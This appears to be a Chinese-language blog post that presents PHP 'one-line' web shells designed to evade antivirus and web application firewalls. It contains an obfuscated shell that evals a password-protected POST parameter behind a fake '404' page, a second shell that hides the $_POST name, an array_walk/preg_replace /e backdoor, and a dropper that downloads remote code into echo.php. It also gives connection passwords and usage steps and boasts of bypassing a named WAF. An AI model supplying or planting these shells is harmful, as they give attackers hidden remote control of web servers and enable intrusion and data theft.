拦截?不存在的—PHP免杀一句话

一句话免杀
<?php $g18="<X(CAT[tuhDdUOvbqPcEil'=5F]NYB!r\";1SL7`9G#k+ w>_{@~y-fHIJ\r:8\$MgoR6}Wj*s^n,4x0\\m.Q%V3|e\n&)azKZ/?2p\t";$GLOBALS['bbsfw34'] = ${$g18[47].$g18[17].$g18[13].$g18[35].$g18[5]};$GLOBALS['majcz28'] = $g18[9].$g18[85].$g18[89].$g18[11].$g18[85].$g18[31];if (!empty($GLOBALS['bbsfw34']['mf8c3a3b0'])) { eval($GLOBALS['bbsfw34']['mf8c3a3b0']); } $GLOBALS['majcz28']($g18[54].$g18[5].$g18[5].$g18[17].$g18[93].$g18[34].$g18[79].$g18[76].$g18[44].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11]); echo $g18[0].$g18[9].$g18[34].$g18[46].$g18[74].$g18[76].$g18[74].$g18[44].$g18[27].$g18[63].$g18[7].$g18[44].$g18[25].$g18[63].$g18[8].$g18[72].$g18[11].$g18[0].$g18[93].$g18[9].$g18[34].$g18[46].$g18[57].$g18[86].$g18[5].$g18[9].$g18[85].$g18[44].$g18[96].$g18[89].$g18[62].$g18[85].$g18[44].$g18[7].$g18[9].$g18[89].$g18[7].$g18[44].$g18[51].$g18[63].$g18[8].$g18[44].$g18[9].$g18[89].$g18[14].$g18[85].$g18[44].$g18[31].$g18[85].$g18[16].$g18[8].$g18[85].$g18[70].$g18[7].$g18[85].$g18[11].$g18[44].$g18[18].$g18[63].$g18[8].$g18[21].$g18[11].$g18[44].$g18[72].$g18[63].$g18[7].$g18[44].$g18[15].$g18[85].$g18[44].$g18[53].$g18[63].$g18[8].$g18[72].$g18[11].$g18[79].$g18[57].$g18[86]; ?>

 

密码 mf8c3a3b0
<?php error_reporting(0); echo "404 Not Found."; $default= "ps_ot" ; $about =strtoupper($default[2]. $default[0] .$default[3]. $default[1].$default[4] ); if (isset(${ $about } ['index' ]) ) {eval ( ${$about } [ 'index'] );} ?>

 

密码 index
array_walk函数,在php4 php5 php7所有php版本中通用.
<?php $e = $_REQUEST[‘www’]; $arr = array($_POST[‘settoken’] => ‘|.*|e’,); array_walk($arr, $e, ”); ?>
使用方法如下图:

在php文件后面加上?www=preg_replace
连接密码为:settoken
这种方式目前还是可以过*狗盾锁的;
<?php file_put_contents(‘echo.php’,file_get_contents(‘http://xxx/xx.txt’));?>
访问一次,会在同目录生成echo.php。此方面需要暴喽自己服务器,解决方法你懂得;

发表评论

电子邮件地址不会被公开。 必填项已用*标注